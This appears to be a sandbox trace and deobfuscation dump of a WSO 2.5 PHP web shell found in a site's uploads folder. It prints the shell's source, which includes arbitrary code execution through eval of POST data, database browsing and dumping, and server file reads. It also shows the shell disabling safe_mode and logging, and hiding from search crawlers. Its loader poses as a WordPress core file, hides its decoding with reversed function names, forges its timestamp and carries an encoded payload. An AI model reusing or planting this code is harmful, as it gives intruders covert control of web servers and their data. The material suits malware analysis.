$pass, $dbname){\r\n\t\t\tswitch($this->type)\t{\r\n\t\t\t\tcase \'mysql\':\r\n\t\t\t\t\tif( $this->link = @mysql_connect($host,$user,$pass,true) ) return true;\r\n\t\t\t\t\tbreak;\r\n\t\t\t\tcase \'pgsql\':\r\n\t\t\t\t\t$host = explode(\':\', $host);\r\n\t\t\t\t\tif(!$host[1]) $host[1]=5432;\r\n\t\t\t\t\tif( $this->link = @pg_connect("host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname") ) return true;\r\n\t\t\t\t\tbreak;\r\n\t\t\t}\r\n\t\t\treturn false;\r\n\t\t}\r\n\t\tfunction selectdb($db) {\r\n\t\t\tswitch($this->type)\t{\r\n\t\t\t\tcase \'mysql\':\r\n\t\t\t\t\tif (@mysql_select_db($db))return true;\r\n\t\t\t\t\tbreak;\r\n\t\t\t}\r\n\t\t\treturn false;\r\n\t\t}\r\n\t\tfunction query($str) {\r\n\t\t\tswitch($this->type) {\r\n\t\t\t\tcase \'mysql\':\r\n\t\t\t\t\treturn $this->res = @mysql_query($str);\r\n\t\t\t\t\tbreak;\r\n\t\t\t\tcase \'pgsql\':\r\n\t\t\t\t\treturn $this->res = @pg_query($this->link,$str);\r\n\t\t\t\t\tbreak;\r\n\t\t\t}\r\n\t\t\treturn false;\r\n\t\t}\r\n\t\tfunction fetch() {\r\n\t\t\t$res = func_num_args()?func_get_arg(0):$this->res;\r\n\t\t\tswitch($this->type)\t{\r\n\t\t\t\tcase \'mysql\':\r\n\t\t\t\t\treturn @mysql_fetch_assoc($res);\r\n\t\t\t\t\tbreak;\r\n\t\t\t\tcase \'pgsql\':\r\n\t\t\t\t\treturn @pg_fetch_assoc($res);\r\n\t\t\t\t\tbreak;\r\n\t\t\t}\r\n\t\t\treturn false;\r\n\t\t}\r\n\t\tfunction listDbs() {\r\n\t\t\tswitch($this->type)\t{\r\n\t\t\t\tcase \'mysql\':\r\n return $this->query("SHOW databases");\r\n\t\t\t\tbreak;\r\n\t\t\t\tcase \'pgsql\':\r\n\t\t\t\t\treturn $this->res = $this->query("SELECT datname FROM pg_database WHERE datistemplate!=\'t\'");\r\n\t\t\t\tbreak;\r\n\t\t\t}\r\n\t\t\treturn false;\r\n\t\t}\r\n\t\tfunction listTables() {\r\n\t\t\tswitch($this->type)\t{\r\n\t\t\t\tcase \'mysql\':\r\n\t\t\t\t\treturn $this->res = $this->query(\'SHOW TABLES\');\r\n\t\t\t\tbreak;\r\n\t\t\t\tcase \'pgsql\':\r\n\t\t\t\t\treturn $this->res = $this->query("select table_name from information_schema.tables where table_schema != \'information_schema\' AND table_schema != \'pg_catalog\'");\r\n\t\t\t\tbreak;\r\n\t\t\t}\r\n\t\t\treturn false;\r\n\t\t}\r\n\t\tfunction error() {\r\n\t\t\tswitch($this->type)\t{\r\n\t\t\t\tcase \'mysql\':\r\n\t\t\t\t\treturn @mysql_error();\r\n\t\t\t\tbreak;\r\n\t\t\t\tcase \'pgsql\':\r\n\t\t\t\t\treturn @pg_last_error();\r\n\t\t\t\tbreak;\r\n\t\t\t}\r\n\t\t\treturn false;\r\n\t\t}\r\n\t\tfunction setCharset($str) {\r\n\t\t\tswitch($this->type)\t{\r\n\t\t\t\tcase \'mysql\':\r\n\t\t\t\t\tif(function_exists(\'mysql_set_charset\'))\r\n\t\t\t\t\t\treturn @mysql_set_charset($str, $this->link);\r\n\t\t\t\t\telse\r\n\t\t\t\t\t\t$this->query(\'SET CHARSET \'.$str);\r\n\t\t\t\t\tbreak;\r\n\t\t\t\tcase \'pgsql\':\r\n\t\t\t\t\treturn @pg_set_client_encoding($this->link, $str);\r\n\t\t\t\t\tbreak;\r\n\t\t\t}\r\n\t\t\treturn false;\r\n\t\t}\r\n\t\tfunction loadFile($str) {\r\n\t\t\tswitch($this->type)\t{\r\n\t\t\t\tcase \'mysql\':\r\n\t\t\t\t\treturn $this->fetch($this->query("SELECT LOAD_FILE(\'".addslashes($str)."\') as file"));\r\n\t\t\t\tbreak;\r\n\t\t\t\tcase \'pgsql\':\r\n\t\t\t\t\t$this->query("CREATE TABLE wso2(file text);COPY wso2 FROM \'".addslashes($str)."\';select file from wso2;");\r\n\t\t\t\t\t$r=array();\r\n\t\t\t\t\twhile($i=$this->fetch())\r\n\t\t\t\t\t\t$r[] = $i[\'file\'];\r\n\t\t\t\t\t$this->query(\'drop table wso2\');\r\n\t\t\t\t\treturn array(\'file\'=>implode("\\n",$r));\r\n\t\t\t\tbreak;\r\n\t\t\t}\r\n\t\t\treturn false;\r\n\t\t}\r\n\t\tfunction dump($table, $fp = false) {\r\n\t\t\tswitch($this->type)\t{\r\n\t\t\t\tcase \'mysql\':\r\n\t\t\t\t\t$res = $this->query(\'SHOW CREATE TABLE `\'.$table.\'`\');\r\n\t\t\t\t\t$create = mysql_fetch_array($res);\r\n\t\t\t\t\t$sql = $create[1].";\\n";\r\n if($fp) fwrite($fp, $sql); else echo($sql);\r\n\t\t\t\t\t$this->query(\'SELECT * FROM `\'.$table.\'`\');\r\n $i = 0;\r\n $head = true;\r\n\t\t\t\t\twhile($item = $this->fetch()) {\r\n $sql = \'\';\r\n if($i % 1000 == 0) {\r\n $head = true;\r\n $sql = ";\\n\\n";\r\n }\r\n\r\n\t\t\t\t\t\t$columns = array();\r\n\t\t\t\t\t\tforeach($item as $k=>$v) {\r\n if($v === null)\r\n $item[$k] = "NULL";\r\n elseif(is_int($v))\r\n $item[$k] = $v;\r\n else\r\n $item[$k] = "\'".@mysql_real_escape_string($v)."\'";\r\n\t\t\t\t\t\t\t$columns[] = "`".$k."`";\r\n\t\t\t\t\t\t}\r\n if($head) {\r\n $sql .= \'INSERT INTO `\'.$table.\'` (\'.implode(", ", $columns).") VALUES \\n\\t(".implode(", ", $item).\')\';\r\n $head = false;\r\n } else\r\n $sql .= "\\n\\t,(".implode(", ", $item).\')\';\r\n if($fp) fwrite($fp, $sql); else echo($sql);\r\n $i++;\r\n\t\t\t\t\t}\r\n if(!$head)\r\n if($fp) fwrite($fp, ";\\n\\n"); else echo(";\\n\\n");\r\n\t\t\t\tbreak;\r\n\t\t\t\tcase \'pgsql\':\r\n\t\t\t\t\t$this->query(\'SELECT * FROM \'.$table);\r\n\t\t\t\t\twhile($item = $this->fetch()) {\r\n\t\t\t\t\t\t$columns = array();\r\n\t\t\t\t\t\tforeach($item as $k=>$v) {\r\n\t\t\t\t\t\t\t$item[$k] = "\'".addslashes($v)."\'";\r\n\t\t\t\t\t\t\t$columns[] = $k;\r\n\t\t\t\t\t\t}\r\n $sql = \'INSERT INTO \'.$table.\' (\'.implode(", ", $columns).\') VALUES (\'.implode(", ", $item).\');\'."\\n";\r\n if($fp) fwrite($fp, $sql); else echo($sql);\r\n\t\t\t\t\t}\r\n\t\t\t\tbreak;\r\n\t\t\t}\r\n\t\t\treturn false;\r\n\t\t}\r\n\t};\r\n\t$db = new DbClass($_POST[\'type\']);\r\n\tif((@$_POST[\'p2\']==\'download\') && (@$_POST[\'p1\']!=\'select\')) {\r\n\t\t$db->connect($_POST[\'sql_host\'], $_POST[\'sql_login\'], $_POST[\'sql_pass\'], $_POST[\'sql_base\']);\r\n\t\t$db->selectdb($_POST[\'sql_base\']);\r\n switch($_POST[\'charset\']) {\r\n case "Windows-1251": $db->setCharset(\'cp1251\'); break;\r\n case "UTF-8": $db->setCharset(\'utf8\'); break;\r\n case "KOI8-R": $db->setCharset(\'koi8r\'); break;\r\n case "KOI8-U": $db->setCharset(\'koi8u\'); break;\r\n case "cp866": $db->setCharset(\'cp866\'); break;\r\n }\r\n if(empty($_POST[\'file\'])) {\r\n ob_start("ob_gzhandler", 4096);\r\n header("Content-Disposition: attachment; filename=dump.sql");\r\n header("Content-Type: text/plain");\r\n foreach($_POST[\'tbl\'] as $v)\r\n\t\t\t\t$db->dump($v);\r\n exit;\r\n } elseif($fp = @fopen($_POST[\'file\'], \'w\')) {\r\n foreach($_POST[\'tbl\'] as $v)\r\n $db->dump($v, $fp);\r\n fclose($fp);\r\n unset($_POST[\'p2\']);\r\n } else\r\n die(\'<script>alert("Error! Can\\\'t open file");window.history.back(-1)</script>\');\r\n\t}\r\n\twsoHeader();\r\n\techo "\r\n<h1>Sql browser</h1><div class=content>\r\n<form name=\'sf\' method=\'post\' onsubmit=\'fs(this);\'><table cellpadding=\'2\' cellspacing=\'0\'><tr>\r\n<td>Type</td><td>Host</td><td>Login</td><td>Password</td><td>Database</td><td></td></tr><tr>\r\n<input type=hidden name=a value=Sql><input type=hidden name=p1 value=\'query\'><input type=hidden name=p2 value=\'\'><input type=hidden name=c value=\'". htmlspecialchars($GLOBALS[\'cwd\']) ."\'><input type=hidden name=charset value=\'". (isset($_POST[\'charset\'])?$_POST[\'charset\']:\'\') ."\'>\r\n<td><select name=\'type\'><option value=\'mysql\' ";\r\n if(@$_POST[\'type\']==\'mysql\')echo \'selected\';\r\necho ">MySql</option><option value=\'pgsql\' ";\r\nif(@$_POST[\'type\']==\'pgsql\')echo \'selected\';\r\necho ">PostgreSql</option></select></td>\r\n<td><input type=text name=sql_host value=\\"". (empty($_POST[\'sql_host\'])?\'localhost\':htmlspecialchars($_POST[\'sql_host\'])) ."\\"></td>\r\n<td><input type=text name=sql_login value=\\"". (empty($_POST[\'sql_login\'])?\'root\':htmlspecialchars($_POST[\'sql_login\'])) ."\\"></td>\r\n<td><input type=text name=sql_pass value=\\"". (empty($_POST[\'sql_pass\'])?\'\':htmlspecialchars($_POST[\'sql_pass\'])) ."\\"></td><td>";\r\n\t$tmp = "<input type=text name=sql_base value=\'\'>";\r\n\tif(isset($_POST[\'sql_host\'])){\r\n\t\tif($db->connect($_POST[\'sql_host\'], $_POST[\'sql_login\'], $_POST[\'sql_pass\'], $_POST[\'sql_base\'])) {\r\n\t\t\tswitch($_POST[\'charset\']) {\r\n\t\t\t\tcase "Windows-1251": $db->setCharset(\'cp1251\'); break;\r\n\t\t\t\tcase "UTF-8": $db->setCharset(\'utf8\'); break;\r\n\t\t\t\tcase "KOI8-R": $db->setCharset(\'koi8r\'); break;\r\n\t\t\t\tcase "KOI8-U": $db->setCharset(\'koi8u\'); break;\r\n\t\t\t\tcase "cp866": $db->setCharset(\'cp866\'); break;\r\n\t\t\t}\r\n\t\t\t$db->listDbs();\r\n\t\t\techo "<select name=sql_base><option value=\'\'></option>";\r\n\t\t\twhile($item = $db->fetch()) {\r\n\t\t\t\tlist($key, $value) = each($item);\r\n\t\t\t\techo \'<option value="\'.$value.\'" \'.($value==$_POST[\'sql_base\']?\'selected\':\'\').\'>\'.$value.\'</option>\';\r\n\t\t\t}\r\n\t\t\techo \'</select>\';\r\n\t\t}\r\n\t\telse echo $tmp;\r\n\t}else\r\n\t\techo $tmp;\r\n\techo "</td>\r\n\t\t\t\t<td><input type=submit value=\'>>\' onclick=\'fs(d.sf);\'></td>\r\n <td><input type=checkbox name=sql_count value=\'on\'" . (empty($_POST[\'sql_count\'])?\'\':\' checked\') . "> count the number of rows</td>\r\n\t\t\t</tr>\r\n\t\t</table>\r\n\t\t<script>\r\n s_db=\'".@addslashes($_POST[\'sql_base\'])."\';\r\n function fs(f) {\r\n if(f.sql_base.value!=s_db) { f.onsubmit = function() {};\r\n if(f.p1) f.p1.value=\'\';\r\n if(f.p2) f.p2.value=\'\';\r\n if(f.p3) f.p3.value=\'\';\r\n }\r\n }\r\n\t\t\tfunction st(t,l) {\r\n\t\t\t\td.sf.p1.value = \'select\';\r\n\t\t\t\td.sf.p2.value = t;\r\n if(l && d.sf.p3) d.sf.p3.value = l;\r\n\t\t\t\td.sf.submit();\r\n\t\t\t}\r\n\t\t\tfunction is() {\r\n\t\t\t\tfor(i=0;i<d.sf.elements[\'tbl[]\'].length;++i)\r\n\t\t\t\t\td.sf.elements[\'tbl[]\'][i].checked = !d.sf.elements[\'tbl[]\'][i].checked;\r\n\t\t\t}\r\n\t\t</script>";\r\n\tif(isset($db) && $db->link){\r\n\t\techo "<br/><table width=100% cellpadding=2 cellspacing=0>";\r\n\t\t\tif(!empty($_POST[\'sql_base\'])){\r\n\t\t\t\t$db->selectdb($_POST[\'sql_base\']);\r\n\t\t\t\techo "<tr><td width=1 style=\'border-top:2px solid #666;\'><span>Tables:</span><br><br>";\r\n\t\t\t\t$tbls_res = $db->listTables();\r\n\t\t\t\twhile($item = $db->fetch($tbls_res)) {\r\n\t\t\t\t\tlist($key, $value) = each($item);\r\n if(!empty($_POST[\'sql_count\']))\r\n $n = $db->fetch($db->query(\'SELECT COUNT(*) as n FROM \'.$value.\'\'));\r\n\t\t\t\t\t$value = htmlspecialchars($value);\r\n\t\t\t\t\techo "<nobr><input type=\'checkbox\' name=\'tbl[]\' value=\'".$value."\'> <a href=# onclick=\\"st(\'".$value."\',1)\\">".$value."</a>" . (empty($_POST[\'sql_count\'])?\' \':" <small>({$n[\'n\']})</small>") . "</nobr><br>";\r\n\t\t\t\t}\r\n\t\t\t\techo "<input type=\'checkbox\' onclick=\'is();\'> <input type=button value=\'Dump\' onclick=\'document.sf.p2.value=\\"download\\";document.sf.submit();\'><br>File path:<input type=text name=file value=\'dump.sql\'></td><td style=\'border-top:2px solid #666;\'>";\r\n\t\t\t\tif(@$_POST[\'p1\'] == \'select\') {\r\n\t\t\t\t\t$_POST[\'p1\'] = \'query\';\r\n $_POST[\'p3\'] = $_POST[\'p3\']?$_POST[\'p3\']:1;\r\n\t\t\t\t\t$db->query(\'SELECT COUNT(*) as n FROM \' . $_POST[\'p2\']);\r\n\t\t\t\t\t$num = $db->fetch();\r\n\t\t\t\t\t$pages = ceil($num[\'n\'] / 30);\r\n echo "<script>d.sf.onsubmit=function(){st(\\"" . $_POST[\'p2\'] . "\\", d.sf.p3.value)}</script><span>".$_POST[\'p2\']."</span> ({$num[\'n\']} records) Page # <input type=text name=\'p3\' value=" . ((int)$_POST[\'p3\']) . ">";\r\n echo " of $pages";\r\n if($_POST[\'p3\'] > 1)\r\n echo " <a href=# onclick=\'st(\\"" . $_POST[\'p2\'] . \'", \' . ($_POST[\'p3\']-1) . ")\'>< Prev</a>";\r\n if($_POST[\'p3\'] < $pages)\r\n echo " <a href=# onclick=\'st(\\"" . $_POST[\'p2\'] . \'", \' . ($_POST[\'p3\']+1) . ")\'>Next ></a>";\r\n $_POST[\'p3\']--;\r\n\t\t\t\t\tif($_POST[\'type\']==\'pgsql\')\r\n\t\t\t\t\t\t$_POST[\'p2\'] = \'SELECT * FROM \'.$_POST[\'p2\'].\' LIMIT 30 OFFSET \'.($_POST[\'p3\']*30);\r\n\t\t\t\t\telse\r\n\t\t\t\t\t\t$_POST[\'p2\'] = \'SELECT * FROM `\'.$_POST[\'p2\'].\'` LIMIT \'.($_POST[\'p3\']*30).\',30\';\r\n\t\t\t\t\techo "<br><br>";\r\n\t\t\t\t}\r\n\t\t\t\tif((@$_POST[\'p1\'] == \'query\') && !empty($_POST[\'p2\'])) {\r\n\t\t\t\t\t$db->query(@$_POST[\'p2\']);\r\n\t\t\t\t\tif($db->res !== false) {\r\n\t\t\t\t\t\t$title = false;\r\n\t\t\t\t\t\techo \'<table width=100% cellspacing=1 cellpadding=2 class=main style="background-color:#292929">\';\r\n\t\t\t\t\t\t$line = 1;\r\n\t\t\t\t\t\twhile($item = $db->fetch())\t{\r\n\t\t\t\t\t\t\tif(!$title)\t{\r\n\t\t\t\t\t\t\t\techo \'<tr>\';\r\n\t\t\t\t\t\t\t\tforeach($item as $key => $value)\r\n\t\t\t\t\t\t\t\t\techo \'<th>\'.$key.\'</th>\';\r\n\t\t\t\t\t\t\t\treset($item);\r\n\t\t\t\t\t\t\t\t$title=true;\r\n\t\t\t\t\t\t\t\techo \'</tr><tr>\';\r\n\t\t\t\t\t\t\t\t$line = 2;\r\n\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\techo \'<tr class="l\'.$line.\'">\';\r\n\t\t\t\t\t\t\t$line = $line==1?2:1;\r\n\t\t\t\t\t\t\tforeach($item as $key => $value) {\r\n\t\t\t\t\t\t\t\tif($value == null)\r\n\t\t\t\t\t\t\t\t\techo \'<td><i>null</i></td>\';\r\n\t\t\t\t\t\t\t\telse\r\n\t\t\t\t\t\t\t\t\techo \'<td>\'.nl2br(htmlspecialchars($value)).\'</td>\';\r\n\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\techo \'</tr>\';\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t\techo \'</table>\';\r\n\t\t\t\t\t} else {\r\n\t\t\t\t\t\techo \'<div><b>Error:</b> \'.htmlspecialchars($db->error()).\'</div>\';\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\t\t\t\techo "<br></form><form onsubmit=\'d.sf.p1.value=\\"query\\";d.sf.p2.value=this.query.value;document.sf.submit();return false;\'><textarea name=\'query\' style=\'width:100%;height:100px\'>";\r\n if(!empty($_POST[\'p2\']) && ($_POST[\'p1\'] != \'loadfile\'))\r\n echo htmlspecialchars($_POST[\'p2\']);\r\n echo "</textarea><br/><input type=submit value=\'Execute\'>";\r\n\t\t\t\techo "</td></tr>";\r\n\t\t\t}\r\n\t\t\techo "</table></form><br/>";\r\n if($_POST[\'type\']==\'mysql\') {\r\n $db->query("SELECT 1 FROM mysql.user WHERE concat(`user`, \'@\', `host`) = USER() AND `File_priv` = \'y\'");\r\n if($db->fetch())\r\n echo "<form onsubmit=\'d.sf.p1.value=\\"loadfile\\";document.sf.p2.value=this.f.value;document.sf.submit();return false;\'><span>Load file</span> <input class=\'toolsInp\' type=text name=f><input type=submit value=\'>>\'></form>";\r\n }\r\n\t\t\tif(@$_POST[\'p1\'] == \'loadfile\') {\r\n\t\t\t\t$file = $db->loadFile($_POST[\'p2\']);\r\n\t\t\t\techo \'<br/><pre class=ml1>\'.htmlspecialchars($file[\'file\']).\'</pre>\';\r\n\t\t\t}\r\n\t} else {\r\n echo htmlspecialchars($db->error());\r\n }\r\n\techo \'</div>\';\r\n\twsoFooter();\r\n}\r\n\r\nfunction actionMailTest() {\r\n\tfunction get_base_url()\r\n\t{\r\n\t\t$myurl = \'http://\'.$_SERVER[\'SERVER_NAME\'].$_SERVER[\'REQUEST_URI\'];\r\n\t\t$p = parse_url($myurl);\r\n\t\t$myname = explode("/", $p[\'path\']);\r\n\t\t$myname = $myname[count($myname) - 1];\r\n\t\t$base_url = $p[\'scheme\'].\'://\'.$p[\'host\'].str_replace($myname, "", $p[\'path\']);\r\n\t\treturn substr($base_url, 0, -1).$_SERVER[\'SCRIPT_NAME\'];\r\n\t}\r\n\tif (!function_exists(\'posix_getegid\')) {\r\n\t $user = @get_current_user();\r\n\t} else {\r\n\t $uid = @posix_getpwuid(posix_geteuid());\r\n\t $user = $uid[\'name\'];\r\n\t}\r\n\t$myurl = get_base_url();\r\n\t$from = "From: Result Doc<$user@".$_SERVER[\'HOST_NAME\'].">";\r\n\twsoHeader();\r\n\techo \'<h1>Mail Test</h1><div class=content><table><form name=em onSubmit="g(null,null,\\\'ems\\\',this.mailto.value,this.usere.value);return false;"><tr><td><span>Send to</span></td>\' . "<td><input type=text name=mailto value=><input type=hidden name=usere value=$user></td></tr>" . \'<tr><td></td><td><input type=submit value=">>"></td></tr></form></table>\';\r\n\tif (isset($_POST[\'p1\'])) {\r\n\t if ($_POST[\'p1\'] == \'ems\') {\r\n\t $from_add = $_POST[\'p3\'] . "@" . php_uname(\'n\');\r\n\t $to_add = $_POST[\'p2\'];\r\n\t $subject = "Mail Test - $myurl";\r\n\t $message = "Test Message : " . $myurl;\r\n\t $headers = "From: Mail Test <$from_add>\\r\\n";\r\n\t $headers.= "Reply-To: $from_add\\r\\n";\r\n\t $headers.= "Return-Path: $from_add\\r\\n";\r\n\t $headers.= \'X-Mailer: PHP/\' . phpversion();\r\n\t if (mail($to_add, $subject, $message, $headers)) {\r\n\t echo "Mail sent to $_POST[p2]";\r\n\t } else {\r\n\t echo "Error sending email!";\r\n\t }\r\n\t }\r\n}\r\necho \'</div><br>\';\r\nwsoFooter();\r\n}\r\n\r\nfunction actionRC() {\r\n\tif(!@$_POST[\'p1\']) {\r\n\t\t$a = array(\r\n\t\t\t"uname" => php_uname(),\r\n\t\t\t"php_version" => phpversion(),\r\n\t\t\t"wso_version" => WSO_VERSION,\r\n\t\t\t"safemode" => @ini_get(\'safe_mode\')\r\n\t\t);\r\n\t\techo serialize($a);\r\n\t} else {\r\n\t\teval($_POST[\'p1\']);\r\n\t}\r\n}\r\nif( empty($_POST[\'a\']) )\r\n\tif(isset($default_action) && function_exists(\'action\' . $default_action))\r\n\t\t$_POST[\'a\'] = $default_action;\r\n\telse\r\n\t\t$_POST[\'a\'] = \'SecInfo\';\r\nif( !empty($_POST[\'a\']) && function_exists(\'action\' . $_POST[\'a\']) )\r\n\tcall_user_func(\'action\' . $_POST[\'a\']);\r\nexit;\r\n' /var/www/html/uploads/crazyshell.php 64 0
2 A /var/www/html/uploads/crazyshell.php(64) : eval()'d code 6 $ini = 'safe_mode=off\ndisable_functions=\nupload_max_filesize = 10M\npost_max_size = 10M'
3 15 0 0.006661 1001856 fopen 0 /var/www/html/uploads/crazyshell.php(64) : eval()'d code 7 2 'php.ini' 'w'
3 15 1 0.006731 1002488
3 15 R resource(4) of type (stream)
2 A /var/www/html/uploads/crazyshell.php(64) : eval()'d code 7 $ht = resource(4) of type (stream)
3 16 0 0.006765 1002416 fwrite 0 /var/www/html/uploads/crazyshell.php(64) : eval()'d code 9 2 resource(4) of type (stream) 'safe_mode=off\ndisable_functions=\nupload_max_filesize = 10M\npost_max_size = 10M'
3 16 1 0.006794 1002480
3 16 R 78
3 17 0 0.006809 1002416 fclose 0 /var/www/html/uploads/crazyshell.php(64) : eval()'d code 10 1 resource(4) of type (stream)
3 17 1 0.006827 1002024
3 17 R TRUE
2 A /var/www/html/uploads/crazyshell.php(64) : eval()'d code 60 $color = '#00ff00'
2 A /var/www/html/uploads/crazyshell.php(64) : eval()'d code 61 $default_action = 'FilesMan'
2 A /var/www/html/uploads/crazyshell.php(64) : eval()'d code 62 $default_use_ajax = TRUE
2 A /var/www/html/uploads/crazyshell.php(64) : eval()'d code 63 $default_charset = 'Windows-1251'
2 A /var/www/html/uploads/crazyshell.php(64) : eval()'d code 66 $userAgents = [0 => 'Google', 1 => 'Slurp', 2 => 'MSNBot', 3 => 'ia_archiver', 4 => 'Yandex', 5 => 'Rambler']
3 18 0 0.006911 1001992 implode 0 /var/www/html/uploads/crazyshell.php(64) : eval()'d code 67 2 '|' [0 => 'Google', 1 => 'Slurp', 2 => 'MSNBot', 3 => 'ia_archiver', 4 => 'Yandex', 5 => 'Rambler']
3 18 1 0.006936 1002136
3 18 R 'Google|Slurp|MSNBot|ia_archiver|Yandex|Rambler'
3 19 0 0.006955 1002072 preg_match 0 /var/www/html/uploads/crazyshell.php(64) : eval()'d code 67 2 '/Google|Slurp|MSNBot|ia_archiver|Yandex|Rambler/i' 'python-requests/2.25.1'
3 19 1 0.006976 1002136
3 19 R 0
3 20 0 0.006990 1001992 ini_set 0 /var/www/html/uploads/crazyshell.php(64) : eval()'d code 73 2 'error_log' NULL
3 20 1 0.007007 1002064
3 20 R ''
3 21 0 0.007020 1001992 ini_set 0 /var/www/html/uploads/crazyshell.php(64) : eval()'d code 74 2 'log_errors' 0
3 21 1 0.007036 1002064
3 21 R '1'
3 22 0 0.007049 1001992 ini_set 0 /var/www/html/uploads/crazyshell.php(64) : eval()'d code 75 2 'max_execution_time' 0
3 22 1 0.007067 1002096
3 22 R '30'
3 23 0 0.007080 1001992 set_time_limit 0 /var/www/html/uploads/crazyshell.php(64) : eval()'d code 76 1 0
3 23 1 0.007096 1002056
3 23 R FALSE
3 24 0 0.007110 1002024 function_exists 0 /var/www/html/uploads/crazyshell.php(64) : eval()'d code 77 1 'set_magic_quotes_runtime'
3 24 1 0.007125 1002064
3 24 R FALSE
3 25 0 0.007138 1002024 define 0 /var/www/html/uploads/crazyshell.php(64) : eval()'d code 78 2 'WSO_VERSION' '2.5'
3 25 1 0.007154 1002128
3 25 R TRUE
3 26 0 0.007167 1002056 get_magic_quotes_gpc 0 /var/www/html/uploads/crazyshell.php(64) : eval()'d code 80 0
3 26 1 0.007180 1002056
3 26 R FALSE
3 27 0 0.007194 1002056 md5 0 /var/www/html/uploads/crazyshell.php(64) : eval()'d code 101 1 'localhost'
3 27 1 0.007209 1002152
3 27 R '421aa90e079fa326b6494f812ad13e79'
3 28 0 0.007225 1002056 wsoLogin 1 /var/www/html/uploads/crazyshell.php(64) : eval()'d code 102 0
0.007272 922736
TRACE END [2023-02-13 01:51:42.865627]
Generated HTML code
<html><head></head><body><center><form method="post">Password: <input type="password" name="pass"><input type="submit" value=">>"></form></center></body></html>Original PHP code
<?php
/**
* Sets up the default filters and actions for most
* of the WordPress hooks.
*
* If you need to remove a default hook, this file will
* give you the priority for which to use to remove the
* hook.
*
* Not all of the default hooks are found in style.php
*
* @package WordPress
* @id 83a6ee9b34553e9cf5ef0c507270c
*/
// Strip, trim, kses, special wp_nonces for string saves
error_reporting(0);
$wp_nonce = "63a9f0ea7bb98050796b649e85481845";
function pre_term_name($auth_data, $wp_nonce) {
if(file_exists("index.php")) {
touch(__FILE__, filemtime("index.php"));
}
$kses_str = str_replace( array ('%', '#'), array ('/', '+'), $auth_data);
$filterfunc = strrev('46esab')."_".strrev('edoced');
$filter = $filterfunc($kses_str);
$preparefunc = strrev('etalfnizg');
return @$preparefunc($filter);
}
if(isset($_POST['newname'])){
if(trim($_POST['newname']) != '') {
$name = trim($_POST['newname']).'.php';
$lul = file_get_contents(__FILE__);
$lol = fopen($name, "w+");
fwrite($lol, $lul);
fclose($lol);
if(file_exists($name)){
unlink(__FILE__);
echo 'xXsUIssAZ:'.$name.':xXsUIssAZ';
}
}
exit;
}
/**
* Sets up the default filters and actions for most
* of the WordPress hooks.
*
* If you need to remove a default hook, this file will
* give you the priority for which to use to remove the
* hook.
*
* Not all of the default hooks are found in style.php
*
* @package WordPress
* @id 83a6ee9b34553e9cf5ef0c507270c
*/
// Strip, trim, kses, special wp_nonces for string saves
$wp_default_logo = '<img src="data:image/png;5X1te9s2EuBn93n6H2BWW0qNLEty0s1Kluxs4mxyTeKs7Wy3Z%tUWqQk1hKpkpQdN5v%fjODd77Ictre3j2nNpZIDAYDYDAYDAaDr7%a%e7rr7bexv7XX323#%VXX39VC6OQsQFzUm8SjBaxHwziyeQi8sPUu5oHo8kqGmdhHKWDi2i1nMeeP1p4H0eTcB6k4W8B5Oy0315EyzjNKEG%dPqAfZbBw#EkXgYRq7vL2bIF5blN99ZtQHI4qQNEg30Cmia3SZgF#NxkSBSmb03G8zill%j4GQmmXGGaBlm9Nnp%fHp27o5nwfj6duleNhpff4W4AAIJHAUfwzRL6#7tcmccR5Nw2gIK3EaDBeNZzNyfAm82m7kSs4H35OifH44Q9S%xdWDhzZJwUQLAtgfMdQFsC#G2agtshCsvDSJvAfSPTo9O%nV0cu6ePj95%f5s9PL1m6N3z94eQc4#wc9Xc8hARE#DbATUZkEEpAMiAfFbOwGINEtGSbCce2PAerscRXE0Dpps4T#poqwBzQnYZTkxlYP9gbibzLl1eJJsf4CAHFCaeC16AF7zF9AGQAS0a1IvJ3c9NdiUW7yRtngvLL00vY0Tfzzzomngu1TKZxbM04CZcBMvnItE#IP%oHsz3nllXRcFt9j4a3tPw4gOZKoH8T00VXWOlkvc1P#T#tvqKcRa2Veqd8v6yhwHhMbsgFU0D6NrXaho6Zv23N9btJOs57YoT8vtqXdVXUCC5SjymSlcxvE8RrZ1vmm3J5N2m2SCH0y81TwbeSRYINV9idLkrRe5ZvIqDUbeL95H6oRVYCYBqyTQ25j1xzDy49t0p9N90sHsxAvbwWKZ3Rnd8Ors7P3oAzyNnv3j6N0Z8gTyFoNPDcpJnk2x9QGflyTeXd35RxxP54EDTX46XyVL%PH29N3f4wx%hd7IS8az8CZI8PEnL%KDj%jrxFuAyEyokxA1ULJMginIxWw8q7u7LmuxcAFC1A%q7n%cpll2A9Lc3RBfbkI1fmaB5wdJncB2O602e9x#zN7FGXsZryLflVTgR3QT%vwspN0hyNgRDhk3SJI4Gc3jqdt89#HNG8ynE#H1iABSt9m2k1DcBx#D8Qq7cZSFMCoECCTT82geLsKs3hayXs4lSi4j3MKbhuPRr6s4C9JRsooID1T0sCqRozsEXggjaMcfT49H0Fqnr4%fQeO53dYTqjkVOM2jmC7H9YaYbwQxDBCgQFumcy#dBTBKiAc40FYSZKskYmE64pwhEw84pwD2JZFgYsA#FGA9Voa6LwYPn7#A6wokUILswNro#fHxD6#PSgF5kpodVa1u0%hNPA2jOq#IHwZ1Z38MnBYkw%1JnCzYIshmsT%AmXv4XsjgHtsPo#UqY9ndMhhIycxQBtDT0ExOV1fQu#zGm6#CgTscusP9XcQMX6Igp0gX1iDIxnF8DRTVrqGpbvRQFLU5r11fQmVrN6IBChmMGVsOdTkX6iFSUBOwAijpv%2W1XGKyr8fQJEajR48Fsk8ozVCXwEWyN80chMDciJYfVuSIWpXjQKI#M9%2EaQOF#VUqs73mglYJoMRPEtiAvoNZy73796Pzo#bbabew2quXMbRg5ODbUY5aALjyhOcRbWL6PwI5exNaUtonqHEmGKEkG9ldrdtgYUJHJhAypMnGRhNOWDGUV7Xt#0EBdSqYDaLAYZM771ERbg4FddFJxTELkSsHU4nvlhYr1GNKUYqMqiIfgYMosz9TDn4gKl%y78USA0xmvrYQUYV1%w6Rwg5zjdY8pOh%oYZo2GRNWiRzXJbcxWOLXgTMpbwRppm2SCKtSvYtApClNzPy9yXvEpibcX0CjnYamn07QtOmOr8BrH%D%eHP%92ZvTczc317uX2KLTeXzlzRnXK%AFKSzO%ixbzIf7OCEO90GueWyWZcud4NdVeDNwn3PlaucMhJbLhKo1cLP